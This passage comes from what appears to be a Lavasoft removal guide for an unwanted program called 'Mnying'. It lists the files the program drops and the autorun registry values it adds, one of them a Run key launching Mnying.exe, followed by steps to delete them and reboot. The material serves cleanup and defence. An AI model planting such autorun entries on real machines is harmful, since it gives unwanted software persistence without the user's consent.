    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\programs_json[1].htm (19 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[5].xml (255 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\recordLottrey.sxx (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fullImage[1].png (910 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[4].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\zhibo2[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (188 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ab[1].data (34949 bytes)
    %System%\d3d9caps.tmp (1324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\34[1].png (1591 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[7].xml (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c2[1].data (34485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\analytics[1].js (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a6[1].data (19329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[3].xml (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[1].xml (245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[6].xml (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a7[1].data (30406 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\ForbiddenTiming[1].htm (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34aa[1].data (18029 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\recommends[1].htm (2 bytes)
    %Documents and Settings%\%current user%\UserData\KTOR0Z81\statistics.m0lxcdn.kukuplay[1].xml (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[2].xml (245 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (332 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\datefengyun.sxx (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\lib20140124182612[1].swf (22561 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[8].xml (85 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\ÃÀŮӪ.lnk (666 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\жÔØÃÀŮӪ.lnk (654 bytes)
    %Program Files%\Mnying\usst.exe (715 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\Mnying.exe (42271 bytes)
    %Documents and Settings%\All Users\Desktop\ÃÀŮӪ.lnk (654 bytes)
    %Program Files%\Mnying\mvyy.exe (7443 bytes)
    %Program Files%\Mnying\Mnying.exe (42271 bytes)
    %Program Files%\Mnying\ÃÀŮӪ.lnk (598 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMNetGetInfo.dll (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMDownload.dll (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tmppm4bkx.dll (24832 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (579 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\dl.dll (65930 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (128685 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\res\onlineWnd.zip (14184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMSkin.dll (36698 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\hu.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMReport.dll.bdl (43572 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDLogicUtils.dll (31856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (784 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMNet.dll.bdl (45996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe.bdl (791837 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (2186490 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\nsExec.dll (15 bytes)
    %Documents and Settings%\%current user%\UserData\index.dat (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\file\vcredist_x86.exe (82435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\BDMSkin.dll (37025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\PluginInstallHelper.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\InstallHelper.dll (34186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\res\InstallWnd.zip (54196 bytes)
    %WinDir%\Temp\Perflib_Perfdata_638.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014061320140614\index.dat (388 bytes)
    C:\PROGRAM FILES (4 bytes)
    %System%\config (96 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFB61A.tmp (100 bytes)
    %Program Files%\Baidu\BaiduAn\2.1.18.21\vcredist_x86.exe (18934 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\ns13.tmp (15 bytes)
    %Documents and Settings%\%current user%\Application Data\zn1320146\set.ini (7 bytes)
    %Documents and Settings%\%current user%\Application Data\zn1320146\set1320146\Setzh1320146.ini (23 bytes)
    %Documents and Settings%\%current user%\Application Data\zn1320146\min.ini (14 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Mnying" = "%Program Files%\Mnying\Mnying.exe /A"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now